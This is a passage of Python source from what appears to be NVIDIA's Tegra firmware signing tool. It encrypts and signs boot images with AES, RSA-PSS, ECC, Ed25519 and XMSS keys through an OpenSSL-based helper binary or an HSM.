hash to *.hash file\n hash_fh = open_file(hash_file_name, 'wb')\n write_file(hash_fh, buff_hash)\n hash_fh.close()\n\n perform_sha(filename, filenode.find('sha'))\n\n elif p_keylist[key_index].mode == NvTegraSign_FSKP:\n\n sbknode = filenode.find('sbk')\n if sbknode is None:\n info_print('sbk tag is not present.')\n return exit_routine()\n\n skip_enc = 0 if int(sbknode.get('encrypt')) >=1 else 1\n do_sign = 1 if int(sbknode.get('sign')) >=1 else 0\n enc_file_name = sbknode.get('encrypt_file')\n hash_file_name = sbknode.get('hash')\n\n NumAesBlocks = int(length/AES_256_HASH_BLOCK_LEN)\n length = int(NumAesBlocks*AES_256_HASH_BLOCK_LEN)\n\n buff_hash = \"0\" * AES_256_HASH_BLOCK_LEN\n buff_enc = bytearray(buff_to_sign)\n\n if (skip_enc or is_zero_aes(p_keylist[key_index])):\n info_print('Skipping encryption: ' + filename, True)\n else:\n buff_enc = do_aes_cbc(buff_to_sign, length, p_keylist[key_index], iv)\n\n if do_sign:\n buff_hash = do_aes_cmac(buff_enc, length, p_keylist[key_index])\n\n buff_data = buff_data[0:offset] + buff_enc + buff_data[offset + length:]\n\n # save encryption to *_encrypt.* file\n enc_fh = open_file(enc_file_name, 'wb')\n write_file(enc_fh, buff_data)\n enc_fh.close()\n\n # save hash to *.hash file\n hash_fh = open_file(hash_file_name, 'wb')\n write_file(hash_fh, buff_hash)\n hash_fh.close()\n\n perform_sha(filename, filenode.find('sha'))\n\n elif p_keylist[key_index].mode == NvTegraSign_ECC:\n\n ecnode = filenode.find('ec')\n if ecnode is None:\n info_print('ec tag is not present')\n return exit_routine()\n\n sig_file_name = ecnode.get('signature')\n signed_file_name = ecnode.get('signed_file')\n\n sig_data = do_ecc(buff_to_sign, length, p_keylist[key_index], pkh, sha_type)\n\n if sig_file_name:\n sig_fh = open_file(sig_file_name, 'wb')\n write_file(sig_fh, sig_data)\n sig_fh.close()\n else:\n info_print('Not saving signature')\n\n if signed_file_name:\n signed_fh = open_file(signed_file_name, 'wb')\n write_file(signed_fh, buff_data)\n signed_fh.close()\n else:\n info_print('Not saving signed file')\n\n elif p_keylist[key_index].mode == NvTegraSign_ED25519:\n\n ednode = filenode.find('eddsa')\n\n if ednode is None:\n info_print('eddsa tag is not present')\n return exit_routine()\n\n sig_file_name = ednode.get('signature')\n signed_file_name = ednode.get('signed_file')\n\n sig_data = do_ed25519(buff_to_sign, length, p_keylist[key_index], pkh)\n\n if sig_file_name:\n sig_fh = open_file(sig_file_name, 'wb')\n write_file(sig_fh, sig_data)\n sig_fh.close()\n else:\n info_print('Not saving signature')\n\n if signed_file_name:\n signed_fh = open_file(signed_file_name, 'wb')\n write_file(signed_fh, buff_data)\n signed_fh.close()\n else:\n info_print('Not saving signed file')\n\n elif p_keylist[key_index].mode == NvTegraSign_XMSS:\n ednode = filenode.find('xmss')\n\n if ednode is None:\n info_print('xmss tag is not present')\n exit_routine()\n\n sig_file_name = ednode.get('signature')\n signed_file_name = ednode.get('signed_file')\n\n sig_data = do_xmss(buff_to_sign, p_keylist[key_index], pkh)\n\n if sig_file_name:\n sig_fh = open_file(sig_file_name, 'wb')\n write_file(sig_fh, sig_data)\n sig_fh.close()\n else:\n info_print('Not saving signature')\n\n if signed_file_name:\n signed_fh = open_file(signed_file_name, 'wb')\n write_file(signed_fh, buff_data)\n signed_fh.close()\n else:\n info_print('Not saving signed file')\n\n else:\n\n pkcnode = filenode.find('pkc')\n if pkcnode is None:\n info_print('pkc tag is not present')\n return exit_routine()\n\n sig_file_name = pkcnode.get('signature')\n signed_file_name = pkcnode.get('signed_file')\n sig_data = do_rsa_pss(buff_to_sign, length, p_keylist[key_index], pkh, mont, sha_type)\n\n if sig_file_name:\n sig_fh = open_file(sig_file_name, 'wb')\n write_file(sig_fh, sig_data)\n sig_fh.close()\n else:\n info_print('Not saving signature')\n\n if signed_file_name:\n signed_fh = open_file(signed_file_name, 'wb')\n write_file(signed_fh, buff_data)\n signed_fh.close()\n else:\n info_print('Not saving signed file')\n return 0\n\n\ndef sign_files_in_list(p_keylist, internal):\n filelistname = internal[\"--list\"]\n pkh, _, _= get_pkh_args(internal)\n mont = internal[\"--getmontgomeryvalues\"]\n iv = internal[\"--iv\"]\n sha_type = internal[\"--sha\"]\n\n try:\n tree = ElementTree.parse(filelistname)\n\n except IOError:\n info_print('Cannot parse %s as a XML file' %(filelistname))\n return exit_routine()\n\n root = tree.getroot()\n\n for child in root:\n retVal = sign_files_internal(p_keylist, child, pkh, mont, sha_type, iv)\n if retVal != 0:\n return retVal\n\n # Add mode info\n root.set('mode', get_mode_str(p_keylist[0], False))\n\n # Prepend the following to the xml content\n comment = '\\n\\n\\n'\n if(isPython3()):\n xml_str = comment + ElementTree.tostring(root, encoding='unicode')\n else:\n xml_str = comment + ElementTree.tostring(root)\n\n # Generate *_signed.xml\n xml_fh = open_file(filelistname.replace('.xml', '_signed.xml'), 'w')\n write_file(xml_fh, xml_str)\n xml_fh.close()\n return 0\n\n\ndef sign_single_file(p_key, internal):\n filename = internal[\"--file\"]\n offset = internal[\"--offset\"]\n length = internal[\"--length\"]\n enc_type = internal[\"--enc\"]\n sign_type = internal[\"--sign\"]\n pkh, _, _ = get_pkh_args(internal)\n mont = internal[\"--getmontgomeryvalues\"]\n iv = internal[\"--iv\"]\n aad = internal[\"--aad\"]\n tag = internal[\"--tag\"]\n verify = internal[\"--verify\"]\n sha512 = internal[\"--sha\"]\n verbose = internal[\"--verbose\"]\n\n with open(filename, 'rb') as f:\n buff_data = bytearray(f.read())\n file_size = len(buff_data)\n\n offset = offset if offset > 0 else 0\n length = length if length > 0 else file_size - offset\n\n if file_size < offset:\n length = 0\n info_print('Warning: Offset %d is more than file Size %d for %s' % (offset, file_size, filename))\n return exit_routine()\n\n if (offset + length) > file_size:\n info_print('Warning: Offset %d + Length %d is greater than file Size %d for %s' % (offset, length, file_size, filename))\n return exit_routine()\n\n buff_to_sign = buff_data[offset : offset + length]\n\n if p_key.mode == NvTegraSign_SBK:\n\n NumAesBlocks = int(length / AES_128_HASH_BLOCK_LEN)\n length = int(NumAesBlocks * AES_128_HASH_BLOCK_LEN)\n\n buff_hash = \"0\" * AES_128_HASH_BLOCK_LEN\n buff_enc = bytearray(buff_to_sign)\n is_hash = False\n\n if ((enc_type == None or enc_type == 'None') or is_zero_aes(p_key)):\n info_print('Skipping encryption: ' + filename, True)\n elif (enc_type == 'aescbc'):\n buff_enc = do_aes_cbc(buff_to_sign, length, p_key, iv)\n elif (enc_type == 'aesgcm'):\n buff_enc = do_aes_gcm(buff_to_sign, length, p_key, iv, aad, tag, verify, verbose)\n tag_file_name = os.path.splitext(filename)[0] + '.tag'\n with open(tag_file_name, 'wb') as f:\n f.write(p_key.kdf.tag.get_hexbuf())\n\n if sign_type == 'hmacsha256':\n buff_hash = do_hmac_sha256(buff_enc, length, p_key)\n is_hash = True\n elif enc_type != 'aesgcm': # cmac is not for aesgcm\n buff_hash = do_aes_cmac(buff_enc, length, p_key)\n is_hash = True\n\n buff_data = buff_data[0:offset] + buff_enc + buff_data[offset + length:]\n\n # save encryption to *_encrypt.* file\n enc_file_name = os.path.splitext(filename)[0] + '_encrypt' + os.path.splitext(filename)[1] # ie. rcm_0_encrypt.rcm\n enc_fh = open_file(enc_file_name, 'wb')\n write_file(enc_fh, buff_data)\n enc_fh.close()\n\n if is_hash == True:\n # save hash to *.hash file\n hash_file_name = os.path.splitext(filename)[0] + '.hash'\n hash_fh = open_file(hash_file_name, 'wb')\n write_file(hash_fh, buff_hash)\n hash_fh.close()\n\n elif p_key.mode == NvTegraSign_FSKP:\n\n NumAesBlocks = int(length/AES_256_HASH_BLOCK_LEN)\n length = int(NumAesBlocks*AES_256_HASH_BLOCK_LEN)\n\n buff_hash = \"0\" * AES_256_HASH_BLOCK_LEN\n buff_enc = bytearray(buff_to_sign)\n is_hash = False\n\n if not is_hsm() and ((enc_type == None or enc_type == 'None') or is_zero_aes(p_key)):\n info_print('Skipping encryption: ' + filename, True)\n elif (enc_type == 'aescbc'):\n buff_enc = do_aes_cbc(buff_to_sign, length, p_key, iv)\n elif (enc_type == 'aesgcm'):\n buff_enc = do_aes_gcm(buff_to_sign, length, p_key, iv, aad, tag, verify, verbose)\n tag_file_name = os.path.splitext(filename)[0] + '.tag'\n with open(tag_file_name, 'wb') as f:\n f.write(p_key.kdf.tag.get_hexbuf())\n\n if sign_type == 'hmacsha256':\n buff_hash = do_hmac_sha256(buff_enc, length, p_key)\n is_hash = True\n elif enc_type != 'aesgcm': # cmac is not for aesgcm\n buff_hash = do_aes_cmac(buff_enc, length, p_key)\n is_hash = True\n\n buff_data = buff_data[0:offset] + buff_enc + buff_data[offset + length:]\n\n # save encryption to *_encrypt.* file\n enc_file_name = os.path.splitext(filename)[0] + '_encrypt' + os.path.splitext(filename)[1] # ie. rcm_0_encrypt.rcm\n enc_fh = open_file(enc_file_name, 'wb')\n write_file(enc_fh, buff_data)\n enc_fh.close()\n\n if is_hash == True:\n # save hash to *.hash file\n hash_file_name = os.path.splitext(filename)[0] + '.hash'\n hash_fh = open_file(hash_file_name, 'wb')\n write_file(hash_fh, buff_hash)\n hash_fh.close()\n\n elif p_key.mode == NvTegraSign_ECC:\n\n sig_data = do_ecc(buff_to_sign, length, p_key, pkh, sha512)\n\n sig_file_name = os.path.splitext(filename)[0] + '.sig'\n sig_fh = open_file(sig_file_name, 'wb')\n write_file(sig_fh, sig_data)\n sig_fh.close()\n\n elif p_key.mode == NvTegraSign_ED25519:\n\n sig_data = do_ed25519(buff_to_sign, length, p_key, pkh)\n sig_file_name = os.path.splitext(filename)[0] + '.sig'\n sig_fh = open_file(sig_file_name, 'wb')\n write_file(sig_fh, sig_data)\n sig_fh.close()\n\n elif p_key.mode == NvTegraSign_XMSS:\n sig_data = do_xmss(buff_to_sign, p_key, pkh)\n sig_file_name = os.path.splitext(filename)[0] + '.sig'\n sig_fh = open_file(sig_file_name, 'wb')\n write_file(sig_fh, sig_data)\n sig_fh.close()\n\n else:\n\n sig_data = do_rsa_pss(buff_to_sign, length, p_key, pkh, mont, sha512)\n sig_file_name = os.path.splitext(filename)[0] + '.sig'\n sig_fh = open_file(sig_file_name, 'wb')\n write_file(sig_fh, sig_data)\n sig_fh.close()\n return 0\n\ndef do_aes_cmac(buff_to_sign, length, p_key):\n buff_sig = \"0\" * 16 # note cmac will always return 128bit\n\n base_name = script_dir + 'v3_cmac_' + pid\n raw_name = base_name + '.raw'\n result_name = base_name + '.out'\n raw_file = open_file(raw_name, 'wb')\n\n key_bytes = len(binascii.hexlify(p_key.key.aeskey))/2\n keysize_bytes = int_2byte_cnt(p_key.keysize)\n len_bytes = int_2byte_cnt(length)\n sign_bytes = len(buff_to_sign)\n sig_bytes = len(buff_sig)\n result_bytes = len(result_name) + 1\n\n # to write to file\n # order: sizes then data for: key, keysize, length, buff_to_sign, buff_sig, result_name\n num_list = [key_bytes, keysize_bytes, len_bytes, sign_bytes, sig_bytes, result_bytes]\n for num in num_list:\n arr = int_2bytes(4, num)\n write_file(raw_file, arr)\n\n write_file(raw_file, p_key.key.aeskey) #aeskey already in byte array format\n arr = int_2bytes(keysize_bytes, p_key.keysize)\n write_file(raw_file, arr)\n arr = int_2bytes(len_bytes, length)\n write_file(raw_file, arr)\n\n write_file(raw_file, bytes(buff_to_sign))\n\n write_file(raw_file, buff_sig.encode(\"utf-8\"))\n write_file(raw_file, result_name.encode(\"utf-8\"))\n nullarr = bytearray(1)\n nullarr[0] = 0 # need this null for char*\n write_file(raw_file, nullarr)\n raw_file.close()\n\n command = exec_file(TegraOpenssl)\n command.extend(['--aescmac', raw_name])\n\n ret_str = run_command(command)\n\n if check_file(result_name):\n result_fh = open_file(result_name, 'rb')\n buff_sig = result_fh.read()\n result_fh.close()\n os.remove(result_name)\n\n os.remove(raw_name)\n return buff_sig\n\ndef do_hmac_sha256(buff_to_sign, length, p_key):\n buff_dgst = \"0\" * 32 # note hmac-sha256 will always return 256bit\n\n if is_hsm():\n from tegrasign_v3_hsm import do_hmac_sha256_hsm\n return do_hmac_sha256_hsm(buff_to_sign, p_key)\n\n base_name = script_dir + 'v3_hmacsha_' + pid\n raw_name = base_name + '.raw'\n result_name = base_name + '.out'\n raw_file = open_file(raw_name, 'wb')\n\n key_bytes = len(binascii.hexlify(p_key.key.aeskey))/2\n keysize_bytes = int_2byte_cnt(p_key.keysize)\n len_bytes = int_2byte_cnt(length)\n hash_bytes = len(buff_to_sign)\n dgst_bytes = len(buff_dgst)\n result_bytes = len(result_name) + 1\n\n # to write to file\n # order: sizes then data for: key, keysize, length, buff_to_sign, buff_dgst, result_name\n num_list = [key_bytes, keysize_bytes, len_bytes, hash_bytes, dgst_bytes, result_bytes]\n for num in num_list:\n arr = int_2bytes(4, num)\n write_file(raw_file, arr)\n\n write_file(raw_file, p_key.key.aeskey) #aeskey already in byte array format\n arr = int_2bytes(keysize_bytes, p_key.keysize)\n write_file(raw_file, arr)\n arr = int_2bytes(len_bytes, length)\n write_file(raw_file, arr)\n\n write_file(raw_file, bytes(buff_to_sign))\n write_file(raw_file, buff_dgst.encode(\"utf-8\"))\n write_file(raw_file, result_name.encode(\"utf-8\"))\n nullarr = bytearray(1)\n nullarr[0] = 0 # need this null for char*\n write_file(raw_file, nullarr)\n raw_file.close()\n\n command = exec_file(TegraOpenssl)\n command.extend(['--hmacsha256', raw_name])\n\n ret_str = run_command(command)\n\n if check_file(result_name):\n result_fh = open_file(result_name, 'rb')\n buff_dgst = result_fh.read()\n result_fh.close()\n os.remove(result_name)\n\n os.remove(raw_name)\n return buff_dgst\n\ndef do_aes_cbc(buff_to_enc, length, p_key, iv):\n\n buff_sig = \"0\" * 16\n base_name = script_dir + 'v3_cbc_' + pid\n raw_name = base_name + '.raw'\n result_name = base_name + '.out'\n raw_file = open_file(raw_name, 'wb')\n\n key_bytes = len(binascii.hexlify(p_key.key.aeskey))/2\n keysize_bytes = int_2byte_cnt(p_key.keysize)\n len_bytes = int_2byte_cnt(length)\n enc_bytes = len(buff_to_enc)\n dest_bytes = int(length)\n result_bytes = len(result_name) + 1\n buff_dest = \"0\" * dest_bytes\n if (type(iv) == str) or (type(iv) == bytearray):\n iv_bytes = len(binascii.hexlify(iv))/2\n else:\n iv_bytes = 0;\n\n # to write to file\n # order: sizes then data for: key, keysize, length, buff_to_enc, buff_dest, result_name, iv\n num_list = [key_bytes, keysize_bytes, len_bytes, enc_bytes, dest_bytes, result_bytes, iv_bytes]\n for num in num_list:\n arr = int_2bytes(4, num)\n write_file(raw_file, arr)\n\n write_file(raw_file, p_key.key.aeskey)\n arr = int_2bytes(keysize_bytes, p_key.keysize)\n write_file(raw_file, arr)\n arr = int_2bytes(len_bytes, length)\n write_file(raw_file, arr)\n\n write_file(raw_file, bytes(buff_to_enc))\n\n write_file(raw_file, buff_dest.encode(\"utf-8\"))\n write_file(raw_file, result_name.encode(\"utf-8\"))\n nullarr = bytearray(1)\n nullarr[0] = 0 # need this null for char*\n write_file(raw_file, nullarr)\n if (iv != None):\n write_file(raw_file, bytes(iv))\n raw_file.close()\n\n command = exec_file(TegraOpenssl)\n command.extend(['--aescbc', raw_name])\n\n ret_str = run_command(command)\n\n if check_file(result_name):\n result_fh = open_file(result_name, 'rb')\n buff_sig = result_fh.read()\n result_fh.close()\n os.remove(result_name)\n\n os.remove(raw_name)\n return buff_sig\n\ndef do_rsa_pss(buff_to_sign, length, p_key, pkhfile, montfile, sha512):\n p_key.key.pkckey.Sha = sha512\n if is_hsm():\n from tegrasign_v3_hsm import do_rsa_pss_hsm\n return do_rsa_pss_hsm(buff_to_sign, p_key)\n\n buff_sig = \"0\" * p_key.keysize\n base_name = script_dir + 'v3_rsa_' + pid\n raw_name = base_name + '.raw'\n result_name = base_name + '.out'\n\n raw_file = open_file(raw_name, 'wb')\n\n filename_bytes = len(p_key.filename) + 1 # to account for 0x0\n len_bytes = int_2byte_cnt(length)\n sign_bytes = len(buff_to_sign)\n sig_bytes = len(buff_sig)\n pkh_bytes = 0 if pkhfile == None else (len(pkhfile) + 1)\n mont_bytes = 0 if montfile == None else (len(montfile) + 1)\n result_bytes = len(result_name) + 1\n\n # order: sizes then data for: file name, length, buff_to_sign, buff_sig, pkhfile, montfile, result_name, sha512\n num_list = [filename_bytes, len_bytes, sign_bytes, sig_bytes, pkh_bytes, mont_bytes, result_bytes, sha512]\n for num in num_list:\n arr = int_2bytes(4, num)\n write_file(raw_file, arr)\n\n write_file(raw_file, bytes(p_key.filename.encode(\"utf-8\")))\n nullarr = bytearray(1)\n nullarr[0] = 0 # need this null for char*\n\n write_file(raw_file, nullarr)\n arr = int_2bytes(len_bytes, length)\n write_file(raw_file, arr)\n\n write_file(raw_file, buff_to_sign)\n write_file(raw_file, bytes(buff_sig.encode(\"utf-8\")))\n\n if (pkh_bytes > 0):\n write_file(raw_file, bytes(pkhfile.encode(\"utf-8\")))\n write_file(raw_file, nullarr)\n\n if (mont_bytes > 0):\n write_file(raw_file, bytes(montfile.encode(\"utf-8\")))\n write_file(raw_file, nullarr)\n\n write_file(raw_file, bytes(result_name.encode(\"utf-8\")))\n write_file(raw_file, nullarr)\n\n raw_file.close()\n\n command = exec_file(TegraOpenssl)\n command.extend(['--rsa', raw_name])\n\n ret_str = run_command(command)\n\n if check_file(result_name):\n result_fh = open_file(result_name, 'rb')\n buff_sig = result_fh.read()\n result_fh.close()\n os.remove(result_name)\n\n os.remove(raw_name)\n return buff_sig\n\ndef do_ecc(buff_to_sign, length, p_key, pkhfile, sha512):\n\n buff_sig = \"0\" * p_key.keysize\n\n base_name = script_dir + 'v3_ecc_' + pid\n raw_name = base_name + '.raw'\n result_name = base_name + '.out'\n raw_file = open_file(raw_name, 'wb')\n\n filename_bytes = len(p_key.filename) + 1 # to account for 0x0\n len_bytes = int_2byte_cnt(length)\n sign_bytes = len(buff_to_sign)\n sig_bytes = len(buff_sig)\n pkh_bytes = 0 if pkhfile == None else (len(pkhfile) + 1)\n result_bytes = len(result_name) + 1\n\n # order: sizes then data for: file name, length, buff_to_sign, buff_sig, pkhfile, result_name, sha512\n num_list = [filename_bytes, len_bytes, sign_bytes, sig_bytes, pkh_bytes, result_bytes, sha512]\n for num in num_list:\n arr = int_2bytes(4, num)\n write_file(raw_file, arr)\n\n write_file(raw_file, bytes(p_key.filename.encode(\"utf-8\")))\n nullarr = bytearray(1)\n nullarr[0] = 0 # need this null for char*\n write_file(raw_file, nullarr)\n\n arr = int_2bytes(len_bytes, length)\n write_file(raw_file, arr)\n\n write_file(raw_file, buff_to_sign)\n write_file(raw_file, bytes(buff_sig.encode(\"utf-8\")))\n\n if (pkh_bytes > 0):\n write_file(raw_file, bytes(pkhfile.encode(\"utf-8\")))\n write_file(raw_file, nullarr)\n\n write_file(raw_file, bytes(result_name.encode(\"utf-8\")))\n write_file(raw_file, nullarr)\n\n raw_file.close()\n\n command = exec_file(TegraOpenssl)\n command.extend(['--ecc', raw_name])\n\n ret_str = run_command(command)\n\n if check_file(result_name):\n result_fh = open_file(result_name, 'rb')\n buff_sig = result_fh.read()\n result_fh.close()\n os.remove(result_name)\n\n os.remove(raw_name)\n return buff_sig\n\ndef do_ed25519(buff_to_sign, length, p_key, pkhfile):\n\n if is_hsm():\n from tegrasign_v3_hsm import do_ed25519_hsm\n return do_ed25519_hsm(buff_to_sign, p_key)\n\n buff_sig = \"0\" * p_key.keysize\n\n base_name = script_dir + 'v3_eddsa_' + pid\n raw_name = base_name + '.raw'\n result_name = base_name + '.out'\n raw_file = open_file(raw_name, 'wb')\n\n filename_bytes = len(p_key.filename) + 1 # to account for 0x0\n len_bytes = int_2byte_cnt(length)\n sign_bytes = len(buff_to_sign)\n sig_bytes = len(buff_sig)\n pkh_bytes = 0 if pkhfile == None else (len(pkhfile) + 1)\n result_bytes = len(result_name) + 1\n\n # order: sizes then data for: file name, length, buff_to_sign, buff_sig, pkhfile, result_name\n num_list = [filename_bytes, len_bytes, sign_bytes, sig_bytes, pkh_bytes, result_bytes]\n for num in num_list:\n arr = int_2bytes(4, num)\n write_file(raw_file, arr)\n\n write_file(raw_file, bytes(p_key.filename.encode(\"utf-8\")))\n nullarr = bytearray(1)\n nullarr[0] = 0 # need this null for char*\n write_file(raw_file, nullarr)\n\n arr = int_2bytes(len_bytes, length)\n write_file(raw_file, arr)\n\n write_file(raw_file, buff_to_sign)\n write_file(raw_file, bytes(buff_sig.encode(\"utf-8\")))\n\n if (pkh_bytes > 0):\n write_file(raw_file, bytes(pkhfile.encode(\"utf-8\")))\n write_file(raw_file, nullarr)\n\n write_file(raw_file, bytes(result_name.encode(\"utf-8\")))\n write_file(raw_file, nullarr)\n\n raw_file.close()\n\n command = exec_file(TegraOpenssl)\n command.extend(['--ed25519', raw_name])\n\n ret_str = run_command(command)\n\n if check_file(result_name):\n result_fh = open_file(result_name, 'rb')\n buff_sig = result_fh.read()\n result_fh.close()\n os.remove(result_name)\n\n os.remove(raw_name)\n return buff_sig\n\ndef do_xmss(buff_to_sign, p_key, pkh):\n # public key file name is xmss-sha256_20.pub\n raw_name = script_dir + 'v3_xmss_' + pid + '.raw'\n buff_sign = None;\n\n key_file = p_key.filename\n cache_file = key_file + '.cache'\n pub_file = os.path.splitext(os.path.basename(key_file))[0] + '.pub'\n result_name = raw_name + '.sig'\n xmss_exe = 'xmss-sign'\n\n if (check_file(xmss_exe) == False):\n raise tegrasign_exception('Can not find %s for signing' % (xmss_exe))\n\n # If any of the three files does not exist, invoke to regenrate key pair\n if (check_file(cache_file) == False or check_file(key_file) == False\n or check_file(pub_file) == False):\n info_print('Regenerating XMSS key pair')\n if (check_file(cache_file) == True):\n os.remove(cache_file)\n if (check_file(key_file) == True):\n os.remove(key_file)\n if (check_file(pub_file) == True):\n os.remove(pub_file)\n # Invoke cmd to regenerate: ./xmss-sign generate --privkey private-key --pubkey public-key\n command = exec_file(xmss_exe)\n command.extend(['generate --privkey ' + key_file + ' --pubkey ' + pub_file]);\n ret_str = run_command(command)\n status = os.stat(key_file)\n mask = oct(status.st_mode)[-3:]\n\n if (status.st_mode & stat.S_IWOTH) or (status.st_mode & stat.S_IXOTH) or (status.st_mode & stat.S_IROTH):\n info_print(key_file + ' file mode needs to be modified, mask: ' + mask)\n new_mode = stat.S_IMODE(os.lstat(key_file).st_mode)\n new_mode = new_mode & 0o770 # get rid of other mode, so resulting in: o=\n try:\n os.chmod(key_file, new_mode)\n info_print('Hit exception when changing the mode: ' + oct(new_mode)[-3:] )\n except Exception as e:\n info_print('Hit exception when changing the mode: ' + oct(new_mode)[-3:] + str(e))\n with open_file(raw_name, 'wb') as raw_file:\n write_file(raw_file, bytes(buff_to_sign))\n\n if pkh:\n shutil.copyfile(pub_file, pkh)\n\n # Generate the signature in file named '$raw_name'.sig\n command = exec_file(xmss_exe)\n command.extend(['sign'])\n command.extend(['-f', raw_name])\n command.extend(['--privkey', key_file])\n command.extend(['-o', result_name])\n ret_str = run_command(command)\n\n if check_file(result_name):\n with open_file(result_name, 'rb') as result_fh:\n buff_sig = result_fh.read()\n os.remove(result_name)\n return buff_sig\n\ndef do_sha(sha_cnt, filename, offset, length, blockSize):\n\n sha_fh = open_file(filename, 'rb')\n buff_data = sha_fh.read()\n sha_fh.close()\n\n file_size = len(buff_data)\n length = length if length > 0 else file_size - offset\n offset = offset if offset > 0 else 0\n\n if file_size < offset:\n length = 0\n info_print('Warning: Offset %d is more than file Size %d for %s' % (offset, file_size, filename))\n return exit_routine()\n\n if (offset + length) > file_size:\n info_print('Warning: Offset %d + Length %d is greater than file Size %d for %s' % (offset, length, file_size, filename))\n return exit_routine()\n\n buff_to_hash = buff_data[offset : offset + length]\n buff_hash = \"0\" * int(sha_cnt)\n len_bytes = int_2byte_cnt(length)\n base_name = script_dir + 'v3_' + os.path.splitext(os.path.basename(filename))[0] + '_' + pid\n hash_file_name = os.path.splitext(filename)[0] + '.sha'\n hash_file_bytes = len(hash_file_name) + 1\n\n # to write to raw file\n raw_name = base_name + '.raw'\n raw_file = open_file(raw_name, 'wb')\n\n # order: sizes then data for: length, buff_to_hash, buff_hash, hash_file_name\n num_list = [len_bytes, length, sha_cnt, hash_file_bytes]\n for num in num_list:\n arr = int_2bytes(4, num)\n write_file(raw_file, arr)\n\n arr = int_2bytes(len_bytes, length)\n write_file(raw_file, arr)\n\n write_file(raw_file, bytes(buff_to_hash))\n write_file(raw_file, bytes(buff_hash.encode(\"utf-8\")))\n nullarr = bytearray(1)\n nullarr[0] = 0 # need this null for char*\n write_file(raw_file, bytes(hash_file_name.encode(\"utf-8\")))\n write_file(raw_file, nullarr)\n\n raw_file.close()\n\n command = exec_file(TegraOpenssl)\n command.extend(['--sha', raw_name])\n if blockSize != \"0\":\n command.extend(['--block', blockSize])\n\n ret_str = run_command(command)\n if check_file(hash_file_name):\n info_print('Sha saved in ' + hash_file_name)\n\n os.remove(raw_name)\n return hash_file_name\n\ndef extract_AES_key(pBuffer, p_key):\n\n # Process the content as binary format\n if not b'0' in pBuffer:\n byte_cnt = len(pBuffer)\n\n if byte_cnt == 16:\n p_key.keysize = byte_cnt\n p_key.key.aeskey = pBuffer\n p_key.mode = NvTegraSign_SBK\n info_print('Key is a SBK key')\n info_print('Key Size is 16 bytes')\n return 1\n\n elif byte_cnt == 32:\n p_key.keysize = byte_cnt\n p_key.key.aeskey = pBuffer\n p_key.mode = NvTegraSign_FSKP\n info_print('Key Size is 32 bytes')\n return 1\n else:\n info_print('Not an AES key', True)\n return 0\n\n try:\n # Process the content as string format\n list_of_elements = [ (number).replace(\"0x\", \"\") for number in pBuffer[:].decode().replace(\"\\n\", \" \").split(\" \") ]\n\n key_str = list_of_elements[0]\n\n for element in list_of_elements[1:]:\n key_str = key_str + element\n\n key_str_length = len(key_str.strip())\n if key_str_length == 32:\n p_key.mode = NvTegraSign_SBK\n info_print('Key is a SBK key')\n info_print('Key Size is 16 bytes')\n\n elif key_str_length == 64:\n p_key.mode = NvTegraSign_FSKP\n info_print('Key Size is 32 bytes')\n\n else:\n info_print('Not an AES key', True)\n return 0\n\n key = str_to_hex(key_str)\n\n p_key.keysize = int(key_str_length/2)\n\n p_key.key.aeskey = bytearray(key)\n\n return 1\n\n except UnicodeDecodeError:\n # key format is in a binary sequence\n byte_cnt = len(pBuffer)\n\n if byte_cnt == 16:\n p_key.keysize = byte_cnt\n p_key.key.aeskey = pBuffer\n p_key.mode = NvTegraSign_SBK\n info_print('Key is a SBK key')\n info_print('Key Size is 16 bytes')\n return 1\n\n elif byte_cnt == 32:\n p_key.keysize = byte_cnt\n p_key.key.aeskey = pBuffer\n p_key.mode = NvTegraSign_FSKP\n info_print('Key Size is 32 bytes')\n return 1\n info_print('Not an AES key', True)\n return 0\n\ndef is_PKC_key(keyfilename, p_key, pkh, mont):\n\n command = exec_file(TegraOpenssl)\n pubkeyfile = 'v3_pub_keyhash'\n temp_copy = 0\n\n # pack the arguments\n if pkh and mont:\n if is_hsm():\n from tegrasign_v3_hsm import get_rsa_mod_hsm, get_rsa_mont_hsm\n return get_rsa_mod_hsm(p_key, pkh) and get_rsa_mont_hsm(p_key, mont)\n\n command.extend(['--isPkcKey', keyfilename, pkh, mont])\n elif pkh:\n if is_hsm():\n from tegrasign_v3_hsm import get_rsa_mod_hsm\n return get_rsa_mod_hsm(p_key, pkh)\n command.extend(['--isPkcKey', keyfilename, pkh])\n elif mont:\n if is_hsm():\n from tegrasign_v3_hsm import get_rsa_mont_hsm\n return get_rsa_mont_hsm(p_key, mont)\n\n command.extend(['--isPkcKey', keyfilename, pubkeyfile, mont])\n temp_copy = 1\n else:\n if is_hsm():\n from tegrasign_v3_hsm import get_rsa_mod_hsm\n return get_rsa_mod_hsm(p_key)\n command.extend(['--isPkcKey', keyfilename])\n\n ret_str = run_command(command)\n\n if temp_copy==1:\n os.remove(pubkeyfile)\n\n if not is_ret_ok(ret_str):\n return False\n\n # scan the return string for decimal value\n m = re.search('Key size is (\\d+)', ret_str)\n if m:\n p_key.keysize = int(m.group(1))\n if (p_key.keysize > 0) and (p_key.keysize < NV_RSA_MAX_KEY_SIZE):\n return True\n return False\n\ndef is_ECC_key(keyfilename, p_key, pkh):\n if is_hsm():\n return False #TODO: Not supported\n\n command = exec_file(TegraOpenssl)\n\n if pkh == None:\n command.extend(['--isEccKey', keyfilename])\n else:\n command.extend(['--isEccKey', keyfilename, pkh])\n\n ret_str = run_command(command)\n\n if is_ret_ok(ret_str):\n # See if the key is p521\n if '521' in ret_str:\n p_key.keysize = NV_ECC521_SIG_STRUCT_SIZE\n else:\n p_key.keysize = NV_ECC_SIG_STRUCT_SIZE\n return True\n return False\n\ndef is_ED25519_key(keyfilename, p_key, pkh):\n\n if is_hsm():\n from tegrasign_v3_hsm import get_ed25519_pub_hsm\n return get_ed25519_pub_hsm(p_key, pkh)\n\n command = exec_file(TegraOpenssl)\n\n if pkh == None:\n command.extend(['--isEd25519Key', keyfilename])\n else:\n command.extend(['--isEd25519Key', keyfilename, pkh])\n\n ret_str = run_command(command)\n if is_ret_ok(ret_str):\n p_key.keysize = ED25519_SIG_SIZE\n return True\n return False\n\ndef is_xmss_key(keyfilename, p_key, pkh):\n\n file_size = os.path.getsize(keyfilename)\n\n if (file_size == XMSS_KEY_SIZE):\n p_key.keysize = XMSS_KEY_SIZE\n info_print('Assuming XMSS key')\n pub_file = os.path.splitext(os.path.basename(keyfilename))[0] + '.pub'\n if pkh and check_file(pub_file):\n # Duplicating the file because we need to pass that back to the caller\n shutil.copyfile(pub_file, pkh)\n return True\n return False\n\ndef do_kdf_kdf2(kdk, kdd, label = None, context = None, HexLabel = False):\n\n msgStr = get_composed_msg(label,context, 256, HexLabel, True)\n\n 